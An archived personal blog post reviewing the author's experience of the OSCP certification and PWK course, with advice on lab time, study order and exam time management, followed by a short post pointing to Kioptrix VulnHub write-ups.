I am now officially an Offensive Security Certified Professional! Yes, I tried harder #tryharder It have been a very tough 3 months of journey, which explains why I have not been blogging anything at all since then. I am happy to be back and blogging once again! Okay, here comes my review about the course, specifically for any fellow aspiring ethical hacker like me, or simply anyone who have passion in the topic of computer security and wants to learn the technical side of the skill set. A little bit about myself (for reference to the content below): I graduated from the National University of Singapore (NUS), School of Computing, Bachelor of E-Commerce, in 2014. Since then, I have been working as an IT Infrastructure Project Delivery Manager at a bank. In my role, I basically coordinates the completion of various deliverable for either the upgrading of existing systems or setting up of new systems. _Up to this point, my job were not security related._ To pursue my interest in information security, I left my job. I took up training courses and obtained my EC-Council Certified Ethical Hacker (CEHv9)
certification during September 2016. Ever since then, I have been doing a lot of self learning on IT security stuff, especially from trying out hands on self-training by hacking the Virtual Machines downloadable from Vulnhub , you can read some of my write-ups over here.
Before you sign up for the OSCP course, it is essential to plan your time well! I made a mistake so I’d like you to learn from it. First, you have to know that to obtain the OSCP certification, you will need to register yourself for the Penetration Testing with Kali (PWK) course.
The course consists of a virtual lab environment of which the credentials will be sent to you (along with training manual and videos) after you have successfully registered for the course. The mistake which I have made is to directly plan for a nice weekend (and a week with lesser work) to sign up for the course, thinking that I could get started immediately. Listen/read: YOU WILL NOT START THE COURSE IMMEDIATELY. Courses will only start at certain days of each week, and each week can only have a limited number of students to start their PWK course, depending on the sign up rates, which will not be disclosed by Offensive Security. For my case, the earliest I could get started back then was 2 weeks after I have signed up for the course. Noticed the mistake here? I totally expected myself to be able to get started right after I signed up! With the above mistake and poor time management at the start, I spent several days on the PDF lab manual exercises and the training videos. As reference, I started working on the lab machines 2 weeks after my PWK course commenced. Many people would recommend that you jump straight into the lab and not waste any time. I would like to disagree partially. While I believe that you could learn faster jumping into the lab straight, but there are some skill sets which you have to pick up before just jumping in straight. Personally, I find that you should go through the lab manual on the chapter regarding various methods for file transfer. You should not miss the chapter for buffer overflow too, that is very important, as it teaches you how to craft your own simple fuzzer, shell code and modify the exploit. The fundamental enumeration techniques are very important too, specifically the chapter on using tools like nmap. Essentially, my point is — DON’T JUST JUMP INTO THE LAB UNLESS YOU KNOW WHAT YOU ARE DOING. Learn the basics, and then jump in to try out the tools. When things are not right, jump out again. That is the whole point of the lab — for you to practice what you learnt and not just study the theory. Regarding the learning curve, I must say that it really takes time to get your very first shell and it gets really addictive. Personally, it took me quite awhile to get my first shell even though it is just simply running the Metasploit tool. Don’t know about Metasploit? Fret not, it will be covered in the lab manual. Or you can complete the Metasploit Unleashed Free Ethical Hacking Course, like I
did. It was good learning as well and most importantly, it is an Own Time Own Target (OTOT) kind of free online course. Be patient, shell will come, you just need to try harder, don’t give up. Thanks to the advise and encouragement from my mentor (Paul, that’s you), I took up the challenge of hacking PAIN as my 10th machine. For those who don’t know what that means — Pain is one of the “boss” machine in the OSCP lab environment, along with his buddies: Sufferance, Humble and Gh0st. Hacking Pain as my 10th machine was no easy task. But like I said, I tried harder, it took my 8 days to root it. No joke, 8 days. Along the way, I learnt a lot of stuff I never imagined myself learning and also never expected myself to be able to understand. Of course, no spoilers, but really, just keep Googling and you will find it, trust me, and trust my mentor. Also thanks to these 8 days of being stuck on a machine, I kind of got used to the suffering (you know the feeling when you have no shells for a long time) and started to really pick up my pace moving forward. While I am not going to spoon feed anyone with any post-enumeration scripts, I must say that you can always write your own scripts, or make use of available resources, there are several very good scripts around, for you to find out. One advise though, DON’T JUST USE IT BLINDLY. My peers Jin Kun and Ryan Teoh advised me the same when I was using the downloaded scripts happily initially too. There are cases where information are not presented to you directly, or when the operation system are not identical with the scripts target. In those cases, what are you going to do? Are you going to modify your script, do it manually, or give up? We never give up, so we have to understand what the script is doing. If you don’t understand it, don’t use it. Learn. It’s the same as Metasploit exploits — you run it, get shell, yay. Next, you should first, try to understand why that happened and try to get the same result without using Metasploit. The good thing is that in each of the Metasploit modules, you can run the command ‘info’ to read its description and you can read the source code of the modules directly in the “_/usr/share/metasploit-framework/modules_” directory. Like many people would have also shared with you, for privilege escalation, the only reference notes which you may need are probably just these listfor Windows and
Linux
respectively.
Learn and understand them and you are good to go. At the end of my lab time, I managed to make my way all the way into the Administrative department (as shown in the image above) and hacked some of the machines in there. During my 3 months of lab time, I managed to root 42 out of machines. It was not that bad, it is possible, you have to believe in yourself. Finally, it’s the exams. For those who are not familiar with the exam format, the hands-on exam duration is 23 hours and 45 minutes. There will be several machines for you to attack and get the “flags”. After your time is up, you will be cut off from the exam’s Virtual Private Network (VPN) and you will have to submit a professionally prepared lab report within the next 24 hours. This document should contain the testing process and step-by-step guides on how to replicate the vulnerability and get shell of the highest systemprivileges.
I was lucky because there were several components that were very similar to some of the machines which I have rooted previously in the lab. While I cannot specifically share what exactly are the components, I believe I can share that, if you keep working on getting more machines rooted and understand the vulnerabilities that you have exploited to root those machines, trust me — you will recognize it when you see it during the exams. Of course, the exam machines will not be so straight forward, but they will most likely be made up of several vulnerabilities (which you have already seen back then in the lab) being put together, where after exploiting one vulnerability, it leads to the discovery or/and exploitation of the next vulnerability. Again, time management is super important during the exams, you should not get stuck for too long and keep getting stuck in that particular spiral. Move on to the next machine and start enumerating for any attack vectors. Come back again later. Don’t give up. THE ONLY REASON WHY THE MACHINE IS THERE IS BECAUSE IT IS HACKABLE, that is the only fact that you should remember during your exams! To sum up, it was a very fruitful and enriching 3 months of lab time taking the PWK course. Definitely, if time allows, I would love to take up other courses from Offensive Security. A shout out: I am very thankful to my friends at Vantage Point Security, whom never fails to ask me about my progress on the lab machines and listen to my rants and gave me motivational speeches. Special thanks to Paul Craig, Jin Kun and Ryan Teoh, whom constantly gave me constructive advise and encouragement that keeps me going, not forgetting the many ping pong sessions whenever I am having mind blockage. Also thanks my family for supporting me! Lastly, my girlfriend is so awesome, for being so understanding and considerate towards me during my busy 3 months of journey towards getting my OSCP certification. Good luck to anyone who wish to take up the challenge of becoming an Offensive Security Certified Professional (OSCP)!SHARE THIS:
* Click to share on LinkedIn (Opens in new window) * Click to share on Facebook (Opens in new window) * Click to share on Twitter (Opens in new window) * Click to share on WhatsApp (Opens in new window) * Click to share on Telegram (Opens in new window) * Click to share on Pocket (Opens in new window) * Click to share on Reddit (Opens in new window) * Click to share on Tumblr (Opens in new window) * Click to email this to a friend (Opens in new window)*
25 Comments
WRITE-UP FOR KIOPTRIX VIRTUAL MACHINES FROM VULNHUB November 3, 2016December 30, 2017Wen Bin KONG CTF
, Resources
CTF
, kioptrix
, vm
, vulnhub
, writeup
I have finally completed the writeup of all 5 Kioptrix VirtualMachines
(VMs)
from Vulnhub.com , I hope they are helpfulto you.
While they are being categorised as “beginner” level challenges, I find them pretty challenging and definitely an effective training for me. I learnt many things through working on these VMs. For your convenience, the following are the 5 writeups on Kioptrixmachines,
* Writeup for Kioptrix: Level 1 (#1) * Writeup for Kioptrix: Level 1.1 (#2) * Writeup for Kioptrix: Level 1.2 (#3) * Writeup for Kioptrix: Level 1.3 (#4) * Writeup for Kioptrix: 2014 (#5)Cheerios!
SHARE THIS:
* Click to share on LinkedIn (Opens in new window) * Click to share on Facebook (Opens in new window) * Click to share on Twitter (Opens in new window) * Click to share on WhatsApp (Opens in new window) * Click to share on Telegram (Opens in new window) * Click to share on Pocket (Opens in new window) * Click to share on Reddit (Opens in new window) * Click to share on Tumblr (Opens in new window) * Click to email this to a friend (Opens in new window)*
5 Comments
POST NAVIGATION
← Older posts
BLOGROLL
* My New Blog
is now @ kongwenbin.com This blog is no longer active, please visit my new blog, thanks! See you there!Search for:
RECENT POSTS
* New Blog URL at kongwenbin.com * Write-up for Stapler: 1 – A Different Path * Write-up for Stapler: 1 * Write-up for FristiLeaks v1.3 * A Review of my past one-year in Information Security * My OSCP / PWK Course Review * Write-up for Kioptrix Virtual Machines from VulnhubCATEGORIES
* Apps
* CTF
* General
* Resources
* Reviews
* Tips
STAY CONNECTED
WordPress.com .
New Blog URL: kongwenbin.comWordPress.com .
Post to
Cancel
Privacy & Cookies: This site uses cookies. By continuing to use this website, you agree to their use. To find out more, including how to control cookies, see here: CookiePolicy
* Follow
*
* New Blog URL: kongwenbin.com* Customize
* Follow
* Sign up
* Log in
* Report this content * Manage subscriptions* Collapse this bar
%d bloggers like this: Send to Email Address Your Name Your Email AddressCancel
Post was not sent - check your email addresses! Email check failed, please try again Sorry, your blog cannot share posts by email.Details
Copyright © 2024 ArchiveBay.com. All rights reserved. Terms of Use | Privacy Policy | DMCA | 2021 | Feedback | Advertising | RSS 2.0